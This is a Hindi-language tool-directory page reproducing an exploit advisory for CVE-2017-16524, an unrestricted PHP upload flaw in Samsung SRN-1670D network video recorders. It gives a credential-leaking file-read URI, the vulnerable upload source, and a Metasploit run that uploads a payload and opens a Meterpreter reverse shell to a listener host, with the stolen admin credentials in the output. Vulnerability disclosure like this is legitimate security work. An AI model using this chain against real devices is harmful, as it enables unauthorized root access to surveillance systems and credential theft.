Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-16524 — अप्रतिबंधित फ़ाइल अपलोड भेद्यता - Samsung SRN-1670D पर Web Viewer 1.0.0.193 | Kitploit
उपकरण/GitHubGitHub/realistic-security/cve-2017-16524
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubrealistic-security/cve-2017-16524

CVE-2017-16524

अप्रतिबंधित फ़ाइल अपलोड भेद्यता - Samsung SRN-1670D पर Web Viewer 1.0.0.193

रिपॉजिटरी देखें
418 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-16524

द्वारा खोजा गया

Omar Mezrag - 0xFFFFFF

प्रभावित उत्पाद

Samsung Network Video Recorders - Web Viewer 1.0.0.193 on Samsung SRN-1670D

उत्पाद का विक्रेता

Hanwha / Samsung Security - https://www.hanwhasecurity.com/

भेद्यता प्रकार

अप्रतिबंधित फ़ाइल अपलोड भेद्यता

हमला वेक्टर

root@kitploit:~
AccessVector (AV): Network
User Interaction (UI): None
Authentication (Au): Requires single instance

प्रभाव

root@kitploit:~
Code execution (ROOT)

प्रभावित घटक

root@kitploit:~
network_ssl_upload.php (tested)
network_802_1x1.php (suspected)
network_802_1x2.php (suspected)

विवरण

Web Viewer 1.0.0.193 on Samsung SRN-1670D डिवाइस एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता से ग्रस्त है: 'network_ssl_upload.php' दूरस्थ प्रमाणित हमलावरों को .php एक्सटेंशन वाले फ़ाइलनाम के माध्यम से मनमाना PHP कोड अपलोड और निष्पादित करने की अनुमति देता है, जिसे बाद में upload/ निर्देशिका में फ़ाइल के सीधे अनुरोध के माध्यम से एक्सेस किया जाता है। इस हमले के लिए प्रमाणीकरण हेतु, कोई व्यक्ति CVE-2015-8279 के रूप में संदर्भित मौजूदा Local File Read Vulnerability का लाभ उठाकर वेब-इंटरफ़ेस क्रेडेंशियल्स को स्पष्ट पाठ (cleartext) में प्राप्त कर सकता है, जो दूरस्थ हमलावरों को निम्न URI के अनुरोध के माध्यम से वेब इंटरफ़ेस क्रेडेंशियल पढ़ने की अनुमति देता है:

root@kitploit:~
cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw 

संवेदनशील स्रोत कोड (network_ssl_upload.php) :

root@kitploit:~
    22 $path = "./upload/";
    23 $file = $_FILES[ "attachFile" ];
    24 $isApply = ( int )$_POST[ "is_apply" ];
    25 $isInstall = ( int )$_POST[ "isInstall" ];
    26 $isCertFlag = ( int )$_POST[ "isCertFlag" ];
    27 
    28 // create socket
    29 $N_message = "";
    30 $sock = mySocket_create($_is_unix_socket);
    31 $connected = mySocket_connect($_is_unix_socket, $sock);
    32 
    33 $loginInfo = new loginInfo();
    34 $retLogin = loginManager( $connected, $sock, null, $loginInfo );
    35 if ( ( $retLogin == true ) && ( $isApply == 2 || $isApply == 3 ) ) {
    36  if ($connected) {
    37   $id = $loginInfo->get_id();
    38   $xmlFile = $id.'_config.xml';
    39   $N_message = "dummy".nvr_command::DELIM;
    40   $N_message .= "userid ".$id.nvr_command::DELIM;
    41   
    42   if ( $isInstall == 1 ) {
    43    // File upload ===============================================================  
    44    if ( $file[ "error" ] 0 ) {
    45     $Error = "Error: ".$file[ "error" ];
    46    } else {
    47     $retFile = @copy( $file[ "tmp_name" ], $path.$file[ "name" ] );
    48    }
    49    // ===========================================================================
    50   }

PoC

Metasploit मॉड्यूल: samsung_srv_1670d_upload_exec

root@kitploit:~
msf exploit(samsung_srv_1670d_upload_exec) > show options 

Module options (exploit/multi/http/samsung_srv_1670d_upload_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.200      yes       The target address.
   RPORT    80               yes       The target port (TCP).
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.122      yes       The listen address
   LPORT  4358             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samsung SRN-1670D == 1.0.0.193


msf exploit(samsung_srv_1670d_upload_exec) > exploit -j 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.122:4358 
msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails...
[+] Credentials obtained successfully: admin:pass123!
[*] Logging...
[+] Authentication Succeeded
[*] Generating payload[ eRdGKfFJ.php ]...
[*] Uploading payload...
[*] Executing payload...
[*] Sending stage (33986 bytes) to 192.168.1.200
[*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100

अतिरिक्त जानकारी

संभवतः 'network_802_1x1.php' और 'network_802_1x2.php' जैसी अन्य स्क्रिप्ट्स भी उसी भेद्यता से प्रभावित हैं, लेकिन मैंने उनका परीक्षण नहीं किया।

संदर्भ

CVE-2015-8279: http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html

टूल डाउनलोड करें